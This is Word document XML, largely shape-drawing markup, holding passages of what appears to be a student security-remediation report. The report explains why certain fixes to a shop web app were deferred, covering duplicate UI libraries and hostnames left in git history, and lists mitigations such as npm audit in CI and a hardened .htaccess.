                                  <a:pt x="804975" y="141945"/>
                                  <a:pt x="802730" y="142875"/>
                                  <a:pt x="800100" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142875"/>
                                  <a:pt x="4650" y="141945"/>
                                  <a:pt x="2790" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="138224"/>
                                  <a:pt x="0" y="135967"/>
                                  <a:pt x="0" y="133350"/>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63" style="width:63.75pt;height:11.25pt;position:absolute;z-index:-2147483571;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:146.18pt;mso-position-vertical-relative:text;margin-top:12.0547pt;" coordsize="8096,1428">
                <v:shape id="Shape 2819" style="position:absolute;width:8096;height:1428;left:0;top:0;" coordsize="809625,142875" path="m9525,0l800100,0c802730,0,804975,930,806835,2766c808695,4626,809625,6883,809625,9525l809625,133350c809625,135967,808695,138224,806835,140084c804975,141945,802730,142875,800100,142875l9525,142875c6895,142875,4650,141945,2790,140084c930,138224,0,135967,0,133350l0,9525c0,6883,930,4626,2790,2766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NF-4 · Supply-chain surface reduction.</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> The frontend ships </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>two complete UI kits</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>shadcn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/Radix </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ant Design), two toast libraries, and a non-standard </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rolldown-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>vite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> build channel that will not receive the same security backports as stable Vite.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6A4280"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4368" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="15FC53EB" wp14:editId="0C2C0CC1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2789931</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>324545</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="581025" cy="133350"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="29764" name="Group 29764"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="581025" cy="133350"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="581025" cy="133350"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="2829" name="Shape 2829"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="581025" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="581025" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="571500" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="574131" y="0"/>
                                  <a:pt x="576376" y="930"/>
                                  <a:pt x="578236" y="2766"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="580096" y="4626"/>
                                  <a:pt x="581025" y="6883"/>
                                  <a:pt x="581025" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="581025" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="581025" y="126442"/>
                                  <a:pt x="580096" y="128674"/>
                                  <a:pt x="578236" y="130535"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="576376" y="132395"/>
                                  <a:pt x="574131" y="133325"/>
                                  <a:pt x="571500" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133325"/>
                                  <a:pt x="4650" y="132395"/>
                                  <a:pt x="2790" y="130535"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128674"/>
                                  <a:pt x="0" y="126442"/>
                                  <a:pt x="0" y="123825"/>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64" style="width:45.75pt;height:10.5pt;position:absolute;z-index:-2147483561;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:219.68pt;mso-position-vertical-relative:text;margin-top:25.5547pt;" coordsize="5810,1333">
                <v:shape id="Shape 2829" style="position:absolute;width:5810;height:1333;left:0;top:0;" coordsize="581025,133350" path="m9525,0l571500,0c574131,0,576376,930,578236,2766c580096,4626,581025,6883,581025,9525l581025,123825c581025,126442,580096,128674,578236,130535c576376,132395,574131,133325,571500,133350l9525,133350c6895,133325,4650,132395,2790,130535c930,128674,0,126442,0,123825l0,9525c0,6883,930,4626,2790,2766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i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Why not:</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> removing a UI library means touching every page that imports from it, and a visual regression </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pass</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> across 24 pages that we cannot properly test without the shop's own data. The dependency count is a real risk; breaking the till is a certain one. </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Mitigated:</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> all 23 advisories cleared, and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> audit</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> now gates CI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3385F394"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b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NF-5 · Rotating leaked values and rewriting history.</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> The production and staging hostnames remain in the frontend's git history, and the live document root still points at the project directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DE4EC1" w14:textId="4EFB6DE1"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5392" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="10F20C4D" wp14:editId="30CEA4B0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1627882</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-19103</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="923925" cy="142875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="29765" name="Group 29765"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="923925" cy="142875"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="923925" cy="142875"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="2837" name="Shape 2837"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="923925" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="923925" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="914400" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="917030" y="0"/>
                                  <a:pt x="919275" y="930"/>
                                  <a:pt x="921135" y="2766"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="922995" y="4626"/>
                                  <a:pt x="923925" y="6883"/>
                                  <a:pt x="923925" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="923925" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="923925" y="135967"/>
                                  <a:pt x="922995" y="138224"/>
                                  <a:pt x="921135" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="919275" y="141945"/>
                                  <a:pt x="917030" y="142875"/>
                                  <a:pt x="914400" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142875"/>
                                  <a:pt x="4650" y="141945"/>
                                  <a:pt x="2790" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="138224"/>
                                  <a:pt x="0" y="135967"/>
                                  <a:pt x="0" y="133350"/>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9765" style="width:72.75pt;height:11.25pt;position:absolute;z-index:-2147483553;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:128.18pt;mso-position-vertical-relative:text;margin-top:-1.50427pt;" coordsize="9239,1428">
                <v:shape id="Shape 2837" style="position:absolute;width:9239;height:1428;left:0;top:0;" coordsize="923925,142875" path="m9525,0l914400,0c917030,0,919275,930,921135,2766c922995,4626,923925,6883,923925,9525l923925,133350c923925,135967,922995,138224,921135,140084c919275,141945,917030,142875,914400,142875l9525,142875c6895,142875,4650,141945,2790,140084c930,138224,0,135967,0,133350l0,9525c0,6883,930,4626,2790,2766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i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Why not:</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> rewriting history with </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>git filter-repo</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> changes every commit hash and breaks every existing clone and it would also destroy the before/after history this assignment is graded on. The complete remediation is to </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rotate</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> the hostnames and move the document root, both of which need DNS and hosting-panel access the team does not control.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8021B9"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6416" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0290CF0E" wp14:editId="0863FAC5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>18157</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-19277</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1123950" cy="314325"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="26396" name="Group 26396"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1123950" cy="314325"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="1123950" cy="314325"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="2860" name="Shape 2860"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="552450" y="0"/>
                            <a:ext cx="571500" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="571500" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="561975" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="564605" y="0"/>
                                  <a:pt x="566850" y="930"/>
                                  <a:pt x="568710" y="2766"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="570570" y="4626"/>
                                  <a:pt x="571500" y="6883"/>
                                  <a:pt x="571500" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="571500" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="571500" y="135967"/>
                                  <a:pt x="570570" y="138199"/>
                                  <a:pt x="568710" y="140060"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="566850" y="141920"/>
                                  <a:pt x="564605" y="142850"/>
                                  <a:pt x="561975" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142850"/>
                                  <a:pt x="4650" y="141920"/>
                                  <a:pt x="2790" y="140060"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="138199"/>
                                  <a:pt x="0" y="135967"/>
                                  <a:pt x="0" y="133350"/>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866" name="Shape 2866"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="171450"/>
                            <a:ext cx="285750" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="285750" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="276225" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="278855" y="0"/>
                                  <a:pt x="281100" y="930"/>
                                  <a:pt x="282960" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="284820" y="4626"/>
                                  <a:pt x="285750" y="6883"/>
                                  <a:pt x="285750" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="285750" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="285750" y="135967"/>
                                  <a:pt x="284820" y="138224"/>
                                  <a:pt x="282960" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="281100" y="141945"/>
                                  <a:pt x="278855" y="142875"/>
                                  <a:pt x="276225" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142875"/>
                                  <a:pt x="4650" y="141945"/>
                                  <a:pt x="2790" y="140084"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="133350"/>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396" style="width:88.5pt;height:24.75pt;position:absolute;z-index:-2147483639;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:1.42969pt;mso-position-vertical-relative:text;margin-top:-1.51792pt;" coordsize="11239,3143">
                <v:shape id="Shape 2860" style="position:absolute;width:5715;height:1428;left:5524;top:0;" coordsize="571500,142875" path="m9525,0l561975,0c564605,0,566850,930,568710,2766c570570,4626,571500,6883,571500,9525l571500,133350c571500,135967,570570,138199,568710,140060c566850,141920,564605,142850,561975,142875l9525,142875c6895,142850,4650,141920,2790,140060c930,138199,0,135967,0,133350l0,9525c0,6883,930,4626,2790,2766c4650,930,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 2866" style="position:absolute;width:2857;height:1428;left:0;top:1714;" coordsize="285750,142875" path="m9525,0l276225,0c278855,0,281100,930,282960,2791c284820,4626,285750,6883,285750,9525l285750,133350c285750,135967,284820,138224,282960,140084c281100,141945,278855,142875,276225,142875l9525,142875c6895,142875,4650,141945,2790,140084l0,133350l0,9525l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7440" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7E981143" wp14:editId="2ADB22EE">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4056756</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-19277</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="638175" cy="142875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="26397" name="Group 26397"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="638175" cy="142875"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="638175" cy="142875"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="2863" name="Shape 2863"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="638175" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="638175" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="628650" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="631280" y="0"/>
                                  <a:pt x="633525" y="930"/>
                                  <a:pt x="635386" y="2766"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="637245" y="4626"/>
                                  <a:pt x="638175" y="6883"/>
                                  <a:pt x="638175" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="638175" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="638175" y="135967"/>
                                  <a:pt x="637245" y="138199"/>
                                  <a:pt x="635386" y="140060"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="633525" y="141920"/>
                                  <a:pt x="631280" y="142850"/>
                                  <a:pt x="628650" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142850"/>
                                  <a:pt x="4650" y="141920"/>
                                  <a:pt x="2790" y="140060"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="138199"/>
                                  <a:pt x="0" y="135967"/>
                                  <a:pt x="0" y="133350"/>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397" style="width:50.25pt;height:11.25pt;position:absolute;z-index:-2147483639;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:319.43pt;mso-position-vertical-relative:text;margin-top:-1.51792pt;" coordsize="6381,1428">
                <v:shape id="Shape 2863" style="position:absolute;width:6381;height:1428;left:0;top:0;" coordsize="638175,142875" path="m9525,0l628650,0c631280,0,633525,930,635386,2766c637245,4626,638175,6883,638175,9525l638175,133350c638175,135967,637245,138199,635386,140060c633525,141920,631280,142850,628650,142875l9525,142875c6895,142850,4650,141920,2790,140060c930,138199,0,135967,0,133350l0,9525c0,6883,930,4626,2790,2766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i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Mitigated:</w:t>
      </w:r>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htaccess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> hardened to deny dotfiles, source directories and logs</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gitignore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> fixed; CI now fails on any </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">tracked </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.env</w:t>
      </w:r>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a runbook is included for the operator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019A875C" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:spacing w:after="166" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="43"/>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38464" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="33D7C8DF" wp14:editId="7841E6A1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2551807</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
